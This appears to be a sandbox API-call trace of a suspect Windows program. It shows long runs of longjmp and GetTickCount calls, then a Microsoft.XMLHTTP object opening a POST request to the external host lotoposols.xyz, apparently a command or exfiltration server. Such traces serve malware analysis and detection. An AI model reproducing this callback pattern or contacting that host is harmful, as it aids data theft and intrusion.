	[0254.603] longjmp () 
	[0254.603] longjmp () 
	[0254.604] longjmp () 
	[0254.604] longjmp () 
	[0254.604] longjmp () 
	[0254.604] longjmp () 
	[0254.605] longjmp () 
	[0254.605] longjmp () 
	[0254.605] longjmp () 
	[0254.605] longjmp () 
	[0254.606] longjmp () 
	[0254.606] longjmp () 
	[0254.606] longjmp () 
	[0254.606] longjmp () 
	[0254.606] longjmp () 
	[0254.607] longjmp () 
	[0254.607] longjmp () 
	[0254.607] longjmp () 
	[0254.607] longjmp () 
	[0254.607] longjmp () 
	[0254.608] longjmp () 
	[0254.608] longjmp () 
	[0254.608] longjmp () 
	[0254.608] longjmp () 
	[0254.609] longjmp () 
	[0254.609] longjmp () 
	[0254.609] GetTickCount () returned 0x11739f5
	[0254.609] longjmp () 
	[0254.609] longjmp () 
	[0254.610] longjmp () 
	[0254.610] longjmp () 
	[0254.610] longjmp () 
	[0254.610] longjmp () 
	[0254.610] longjmp () 
	[0254.611] longjmp () 
	[0254.611] longjmp () 
	[0254.611] longjmp () 
	[0254.611] longjmp () 
	[0254.611] longjmp () 
	[0254.612] longjmp () 
	[0254.612] longjmp () 
	[0254.612] longjmp () 
	[0254.612] longjmp () 
	[0254.612] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.613] longjmp () 
	[0254.614] longjmp () 
	[0254.614] longjmp () 
	[0254.614] longjmp () 
	[0254.614] longjmp () 
	[0254.615] longjmp () 
	[0254.615] longjmp () 
	[0254.615] longjmp () 
	[0254.615] longjmp () 
	[0254.615] GetTickCount () returned 0x11739f5
	[0254.615] longjmp () 
	[0254.616] longjmp () 
	[0254.616] longjmp () 
	[0254.616] longjmp () 
	[0254.616] longjmp () 
	[0254.616] longjmp () 
	[0254.617] longjmp () 
	[0254.617] longjmp () 
	[0254.617] longjmp () 
	[0254.617] longjmp () 
	[0254.618] longjmp () 
	[0254.618] longjmp () 
	[0254.618] longjmp () 
	[0254.618] longjmp () 
	[0254.618] longjmp () 
	[0254.619] longjmp () 
	[0254.619] longjmp () 
	[0254.619] longjmp () 
	[0254.619] longjmp () 
	[0254.620] longjmp () 
	[0254.620] longjmp () 
	[0254.620] longjmp () 
	[0254.620] longjmp () 
	[0254.621] longjmp () 
	[0254.621] longjmp () 
	[0254.621] longjmp () 
	[0254.622] longjmp () 
	[0254.622] longjmp () 
	[0254.622] longjmp () 
	[0254.622] longjmp () 
	[0254.622] longjmp () 
	[0254.623] longjmp () 
	[0254.623] GetTickCount () returned 0x11739f5
	[0254.623] longjmp () 
	[0254.623] longjmp () 
	[0254.623] longjmp () 
	[0254.623] longjmp () 
	[0254.640] longjmp () 
	[0254.641] longjmp () 
	[0254.641] longjmp () 
	[0254.641] longjmp () 
	[0254.641] longjmp () 
	[0254.642] longjmp () 
	[0254.642] longjmp () 
	[0254.642] longjmp () 
	[0254.642] longjmp () 
	[0254.643] longjmp () 
	[0254.643] longjmp () 
	[0254.643] longjmp () 
	[0254.643] longjmp () 
	[0254.643] longjmp () 
	[0254.644] longjmp () 
	[0254.644] longjmp () 
	[0254.644] longjmp () 
	[0254.644] longjmp () 
	[0254.645] longjmp () 
	[0254.645] longjmp () 
	[0254.645] longjmp () 
	[0254.645] longjmp () 
	[0254.645] longjmp () 
	[0254.646] longjmp () 
	[0254.646] longjmp () 
	[0254.646] longjmp () 
	[0254.646] longjmp () 
	[0254.647] longjmp () 
	[0254.647] GetTickCount () returned 0x1173a14
	[0254.647] longjmp () 
	[0254.647] longjmp () 
	[0254.647] longjmp () 
	[0254.647] longjmp () 
	[0254.648] longjmp () 
	[0254.648] longjmp () 
	[0254.648] longjmp () 
	[0254.648] longjmp () 
	[0254.649] longjmp () 
	[0254.649] longjmp () 
	[0254.649] longjmp () 
	[0254.649] longjmp () 
	[0254.650] longjmp () 
	[0254.650] longjmp () 
	[0254.650] longjmp () 
	[0254.650] longjmp () 
	[0254.650] longjmp () 
	[0254.651] longjmp () 
	[0254.651] longjmp () 
	[0254.651] longjmp () 
	[0254.651] longjmp () 
	[0254.651] longjmp () 
	[0254.652] longjmp () 
	[0254.652] longjmp () 
	[0254.652] longjmp () 
	[0254.653] longjmp () 
	[0254.653] longjmp () 
	[0254.653] longjmp () 
	[0254.655] GetTickCount () returned 0x1173a14
	[0254.656] longjmp () 
	[0254.656] longjmp () 
	[0254.656] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x26d970 | out: lpclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0254.656] SysStringLen (param_1=0x0) returned 0x0
	[0254.656] CoGetClassObject (in: rclsid=0x26d970*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef914e1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26d940 | out: ppv=0x26d940*=0x7fef40bac20) returned 0x0
	[0254.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef40bac20, riid=0x7fef9156380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x26d948 | out: ppvObject=0x26d948*=0x0) returned 0x80004002
	[0254.657] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef40bac20, pUnkOuter=0x0, riid=0x7fef914ccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d930 | out: ppvObject=0x26d930*=0x47a5aa0) returned 0x0
	[0254.657] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef40bac20) returned 0x1
	[0254.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef91563b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26d908 | out: ppvObject=0x26d908*=0x47a5c08) returned 0x0
	[0254.657] ??2@YAPEAX_K@Z () returned 0x3cacc0
	[0254.657] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x47a5c08, pUnkSite=0x3cacc0) returned 0x0
	[0254.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d678 | out: ppvObject=0x26d678*=0x0) returned 0x80004002
	[0254.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d680 | out: ppvObject=0x26d680*=0x0) returned 0x80004002
	[0254.657] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0254.657] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d860 | out: ppvObject=0x26d860*=0x3cacc0) returned 0x0
	[0254.658] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c680 | out: ppvObject=0x26c680*=0x3cacc0) returned 0x0
	[0254.658] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b8 | out: ppvObject=0x26c6b8*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26c6a8 | out: ppvObject=0x26c6a8*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c678 | out: ppvObject=0x26c678*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0254.658] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c768 | out: ppvObject=0x26c768*=0x0) returned 0x80004002
	[0254.658] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26c750 | out: ppvObject=0x26c750*=0x3cacc0) returned 0x0
	[0254.658] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c780 | out: ppvObject=0x26c780*=0x0) returned 0x80004002
	[0254.659] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26c758 | out: ppvObject=0x26c758*=0x0) returned 0x80004002
	[0254.659] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0254.659] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d878 | out: ppvObject=0x26d878*=0x3cacc0) returned 0x0
	[0254.659] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x26d870 | out: ppvObject=0x26d870*=0x0) returned 0x80004002
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x47a5c08) returned 0x0
	[0254.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d918 | out: ppvObject=0x26d918*=0x47a5aa0) returned 0x0
	[0254.659] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x3
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x2
	[0254.659] XMLHTTPRequest:IUnknown:Release (This=0x47a5aa0) returned 0x1
	[0254.659] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0254.659] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26dbf0 | out: ppvObject=0x26dbf0*=0x0) returned 0x80004002
	[0254.660] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x47a5aa0, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x26dd90*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x26db44 | out: rgDispId=0x26db44*=1) returned 0x0
	[0254.663] XMLHTTPRequest:IUnknown:AddRef (This=0x47a5aa0) returned 0x2
	[0254.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x47a5aa0, riid=0x7fef914d588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x26d8d0 | out: ppvObject=0x26d8d0*=0x0) returned 0x80004002
	[0254.663] XMLHTTPRequest:IDispatch:Invoke (in: This=0x47a5aa0, dispIdMember=1, riid=0x7fef914ccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0, puArgErr=0x26d8c0 | out: pDispParams=0x26d8a8*(rgvarg=([0]=0x42be18*(varType=0xb, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x420000, varVal2=0x0), [1]=0x42be30*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42da90*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="https://lotoposols.xyz", varVal2=0x0), varVal2=0x0), [2]=0x42be48*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42d958*(varType=0x8, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1="post", varVal2=0x0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x26d8f0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x26d8c0*=0x26dd90) returned 0x0
	[0254.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff44d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce18 | out: ppvObject=0x26ce18*=0x0) returned 0x80004002
	[0254.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7feff426f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ce20 | out: ppvObject=0x26ce20*=0x0) returned 0x80004002
	[0254.663] XMLHTTPRequest:IUnknown:AddRef (This=0x3cacc0) returned 0x2
	[0254.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40c8070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26d000 | out: ppvObject=0x26d000*=0x3cacc0) returned 0x0
	[0254.663] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26be20 | out: ppvObject=0x26be20*=0x3cacc0) returned 0x0
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be58 | out: ppvObject=0x26be58*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef40d0870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x26be48 | out: ppvObject=0x26be48*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26be18 | out: ppvObject=0x26be18*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0254.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf08 | out: ppvObject=0x26bf08*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26bef0 | out: ppvObject=0x26bef0*=0x3cacc0) returned 0x0
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d08d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef40b9ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf20 | out: ppvObject=0x26bf20*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40cbbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x26bef8 | out: ppvObject=0x26bef8*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IServiceProvider:QueryService (in: This=0x3cacc0, guidService=0x7fef40d0880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef40d08b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x26bf00 | out: ppvObject=0x26bf00*=0x0) returned 0x80004002
	[0254.664] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x3
	[0254.664] XMLHTTPRequest:IUnknown:Release (This=0x3cacc0) returned 0x2
	[0254.664] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x3cacc0, riid=0x7fef40d08a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x26d018 | out: ppvObject=0x26d018*=0x3cacc0) returned 0x0
